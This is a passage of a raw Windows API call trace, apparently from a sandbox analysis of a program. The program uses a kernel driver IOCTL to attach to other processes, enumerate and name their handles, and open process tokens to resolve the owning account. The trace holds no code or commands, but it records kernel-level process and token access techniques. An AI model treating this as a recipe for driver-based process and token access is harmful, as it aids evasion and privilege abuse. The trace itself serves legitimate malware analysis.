AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a01c7f0, HandleInformation=0x0) returned 0x0 [0290.082] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.082] PsReleaseProcessExitSynchronization () returned 0x2 [0290.082] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30037 [0290.082] ObQueryNameString (in: Object=0xffffe0006a01c7f0, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.082] ObfDereferenceObject (Object=0xffffe0006a01c7f0) returned 0x7fff [0290.082] IoCompleteRequest () returned 0x0 [0290.082] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.082] PsAcquireProcessExitSynchronization () returned 0x0 [0290.082] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.082] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a025090, HandleInformation=0x0) returned 0x0 [0290.082] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.082] PsReleaseProcessExitSynchronization () returned 0x2 [0290.082] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30036 [0290.082] ObQueryNameString (in: Object=0xffffe0006a025090, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.082] ObfDereferenceObject (Object=0xffffe0006a025090) returned 0x800e [0290.082] IoCompleteRequest () returned 0x0 [0290.082] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.082] PsAcquireProcessExitSynchronization () returned 0x0 [0290.082] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.082] ObReferenceObjectByHandle (in: Handle=0x330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a08af20, HandleInformation=0x0) returned 0x0 [0290.082] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.082] PsReleaseProcessExitSynchronization () returned 0x2 [0290.082] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30035 [0290.082] ObQueryNameString (in: Object=0xffffe0006a08af20, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.082] ObfDereferenceObject (Object=0xffffe0006a08af20) returned 0x800e [0290.082] IoCompleteRequest () returned 0x0 [0290.082] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.082] PsAcquireProcessExitSynchronization () returned 0x0 [0290.082] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.082] ObReferenceObjectByHandle (in: Handle=0x38c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2598c0, HandleInformation=0x0) returned 0x0 [0290.082] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.082] PsReleaseProcessExitSynchronization () returned 0x2 [0290.082] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30034 [0290.082] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.083] ObfDereferenceObject (Object=0xffffe0006a2598c0) returned 0x7fff [0290.083] IoCompleteRequest () returned 0x0 [0290.083] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.083] PsAcquireProcessExitSynchronization () returned 0x0 [0290.083] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.083] ObReferenceObjectByHandle (in: Handle=0x3a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a018090, HandleInformation=0x0) returned 0x0 [0290.083] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.083] PsReleaseProcessExitSynchronization () returned 0x2 [0290.083] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30033 [0290.083] ObQueryNameString (in: Object=0xffffe0006a018090, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.083] ObfDereferenceObject (Object=0xffffe0006a018090) returned 0x7ff9 [0290.083] IoCompleteRequest () returned 0x0 [0290.083] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.083] PsAcquireProcessExitSynchronization () returned 0x0 [0290.083] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.083] ObReferenceObjectByHandle (in: Handle=0x3b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a257380, HandleInformation=0x0) returned 0x0 [0290.083] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.083] PsReleaseProcessExitSynchronization () returned 0x2 [0290.083] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30032 [0290.083] ObQueryNameString (in: Object=0xffffe0006a257380, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.083] ObfDereferenceObject (Object=0xffffe0006a257380) returned 0x7fad [0290.083] IoCompleteRequest () returned 0x0 [0290.083] PsLookupProcessByProcessId (in: ProcessId=0x7d0, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.083] PsAcquireProcessExitSynchronization () returned 0x0 [0290.083] KeStackAttachProcess (in: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e0f840, ApcState=0xffffd000ac0cf400) [0290.083] ObReferenceObjectByHandle (in: Handle=0x460, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0007ddf3aa0, HandleInformation=0x0) returned 0x0 [0290.083] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.083] PsReleaseProcessExitSynchronization () returned 0x2 [0290.083] ObfDereferenceObject (Object=0xffffe00069e0f840) returned 0x30031 [0290.083] ObQueryNameString (in: Object=0xffffe0007ddf3aa0, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.083] ObfDereferenceObject (Object=0xffffe0007ddf3aa0) returned 0x800c [0290.083] IoCompleteRequest () returned 0x0 [0290.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x698) returned 0x188 [0290.083] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0290.083] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069e34840, HandleInformation=0x0) returned 0x0 [0290.083] ObOpenObjectByPointer (in: Object=0xffffe00069e34840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0290.083] ObfDereferenceObject (Object=0xffffe00069e34840) returned 0x2ffdd [0290.083] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe00069163cc0 | out: TokenHandle=0xffffe00069163cc0*=0x18c) returned 0x0 [0290.083] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0290.083] IoCompleteRequest () returned 0x0 [0290.084] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0290.084] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.084] CloseHandle (hObject=0x18c) returned 1 [0290.084] CloseHandle (hObject=0x188) returned 1 [0290.085] PsLookupProcessByProcessId (in: ProcessId=0x698, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.085] PsAcquireProcessExitSynchronization () returned 0x0 [0290.085] KeStackAttachProcess (in: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400) [0290.085] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b5e170, HandleInformation=0x0) returned 0x0 [0290.085] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.085] PsReleaseProcessExitSynchronization () returned 0x2 [0290.085] ObfDereferenceObject (Object=0xffffe00069e34840) returned 0x27fdb [0290.085] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.085] ObfDereferenceObject (Object=0xffffe00069b5e170) returned 0x7ffe [0290.085] IoCompleteRequest () returned 0x0 [0290.085] PsLookupProcessByProcessId (in: ProcessId=0x698, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.085] PsAcquireProcessExitSynchronization () returned 0x0 [0290.085] KeStackAttachProcess (in: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400) [0290.085] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d9c500, HandleInformation=0x0) returned 0x0 [0290.085] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.085] PsReleaseProcessExitSynchronization () returned 0x2 [0290.085] ObfDereferenceObject (Object=0xffffe00069e34840) returned 0x27fda [0290.085] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.085] ObfDereferenceObject (Object=0xffffe00069d9c500) returned 0x7ffb [0290.085] IoCompleteRequest () returned 0x0 [0290.085] PsLookupProcessByProcessId (in: ProcessId=0x698, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.085] PsAcquireProcessExitSynchronization () returned 0x0 [0290.085] KeStackAttachProcess (in: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400) [0290.085] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e57dc0, HandleInformation=0x0) returned 0x0 [0290.085] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.085] PsReleaseProcessExitSynchronization () returned 0x2 [0290.085] ObfDereferenceObject (Object=0xffffe00069e34840) returned 0x27fd9 [0290.085] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.085] ObfDereferenceObject (Object=0xffffe00069e57dc0) returned 0x7ffb [0290.085] IoCompleteRequest () returned 0x0 [0290.085] PsLookupProcessByProcessId (in: ProcessId=0x698, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.085] PsAcquireProcessExitSynchronization () returned 0x0 [0290.085] KeStackAttachProcess (in: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069e34840, ApcState=0xffffd000ac0cf400) [0290.085] ObReferenceObjectByHandle (in: Handle=0x37c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a274830, HandleInformation=0x0) returned 0x0 [0290.085] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.085] PsReleaseProcessExitSynchronization () returned 0x2 [0290.085] ObfDereferenceObject (Object=0xffffe00069e34840) returned 0x27fd8 [0290.085] ObQueryNameString (in: Object=0xffffe0006a274830, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.085] ObfDereferenceObject (Object=0xffffe0006a274830) returned 0x7fff [0290.085] IoCompleteRequest () returned 0x0 [0290.085] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x188 [0290.085] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0290.085] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00069ef4840, HandleInformation=0x0) returned 0x0 [0290.086] ObOpenObjectByPointer (in: Object=0xffffe00069ef4840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0290.086] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x6670c [0290.086] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe00069163cc0 | out: TokenHandle=0xffffe00069163cc0*=0x18c) returned 0x0 [0290.086] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0290.086] IoCompleteRequest () returned 0x0 [0290.086] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0290.086] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0290.087] CloseHandle (hObject=0x18c) returned 1 [0290.087] CloseHandle (hObject=0x188) returned 1 [0290.087] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.087] PsAcquireProcessExitSynchronization () returned 0x0 [0290.087] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.087] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069db1090, HandleInformation=0x0) returned 0x0 [0290.087] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.087] PsReleaseProcessExitSynchronization () returned 0x2 [0290.087] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e70a [0290.087] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.087] ObfDereferenceObject (Object=0xffffe00069db1090) returned 0x7feb [0290.087] IoCompleteRequest () returned 0x0 [0290.087] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.087] PsAcquireProcessExitSynchronization () returned 0x0 [0290.087] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.087] ObReferenceObjectByHandle (in: Handle=0xcc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bf6d00, HandleInformation=0x0) returned 0x0 [0290.087] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.087] PsReleaseProcessExitSynchronization () returned 0x2 [0290.087] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e709 [0290.087] ObQueryNameString (in: Object=0xffffe00069bf6d00, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.087] ObfDereferenceObject (Object=0xffffe00069bf6d00) returned 0x800e [0290.087] IoCompleteRequest () returned 0x0 [0290.087] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.087] PsAcquireProcessExitSynchronization () returned 0x0 [0290.087] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.087] ObReferenceObjectByHandle (in: Handle=0x204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069acb3a0, HandleInformation=0x0) returned 0x0 [0290.087] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.087] PsReleaseProcessExitSynchronization () returned 0x2 [0290.087] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e708 [0290.087] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.087] ObfDereferenceObject (Object=0xffffe00069acb3a0) returned 0x7ffb [0290.087] IoCompleteRequest () returned 0x0 [0290.087] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.087] PsAcquireProcessExitSynchronization () returned 0x0 [0290.087] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.087] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069db7090, HandleInformation=0x0) returned 0x0 [0290.087] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.087] PsReleaseProcessExitSynchronization () returned 0x2 [0290.087] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e707 [0290.087] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.087] ObfDereferenceObject (Object=0xffffe00069db7090) returned 0x7ff4 [0290.087] IoCompleteRequest () returned 0x0 [0290.088] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.088] PsAcquireProcessExitSynchronization () returned 0x0 [0290.088] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.088] ObReferenceObjectByHandle (in: Handle=0x338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f09ab0, HandleInformation=0x0) returned 0x0 [0290.088] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.088] PsReleaseProcessExitSynchronization () returned 0x2 [0290.088] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e706 [0290.088] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.088] ObfDereferenceObject (Object=0xffffe00069f09ab0) returned 0x7fff [0290.088] IoCompleteRequest () returned 0x0 [0290.088] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.088] PsAcquireProcessExitSynchronization () returned 0x0 [0290.088] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.088] ObReferenceObjectByHandle (in: Handle=0x348, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069db0c60, HandleInformation=0x0) returned 0x0 [0290.088] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.088] PsReleaseProcessExitSynchronization () returned 0x2 [0290.088] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e705 [0290.088] ObQueryNameString (in: Object=0xffffe00069db0c60, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.088] ObfDereferenceObject (Object=0xffffe00069db0c60) returned 0x8007 [0290.088] IoCompleteRequest () returned 0x0 [0290.088] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.088] PsAcquireProcessExitSynchronization () returned 0x0 [0290.088] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.088] ObReferenceObjectByHandle (in: Handle=0x388, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069db8900, HandleInformation=0x0) returned 0x0 [0290.088] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.088] PsReleaseProcessExitSynchronization () returned 0x2 [0290.088] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e704 [0290.088] ObQueryNameString (in: Object=0xffffe00069db8900, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.088] ObfDereferenceObject (Object=0xffffe00069db8900) returned 0x7ffe [0290.088] IoCompleteRequest () returned 0x0 [0290.088] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.088] PsAcquireProcessExitSynchronization () returned 0x0 [0290.088] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.088] ObReferenceObjectByHandle (in: Handle=0x3a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f6c160, HandleInformation=0x0) returned 0x0 [0290.088] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.088] PsReleaseProcessExitSynchronization () returned 0x2 [0290.088] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e703 [0290.088] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.088] ObfDereferenceObject (Object=0xffffe00069f6c160) returned 0x7fff [0290.088] IoCompleteRequest () returned 0x0 [0290.088] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.088] PsAcquireProcessExitSynchronization () returned 0x0 [0290.088] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.089] ObReferenceObjectByHandle (in: Handle=0x3c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069db8410, HandleInformation=0x0) returned 0x0 [0290.089] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.089] PsReleaseProcessExitSynchronization () returned 0x2 [0290.089] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e702 [0290.089] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 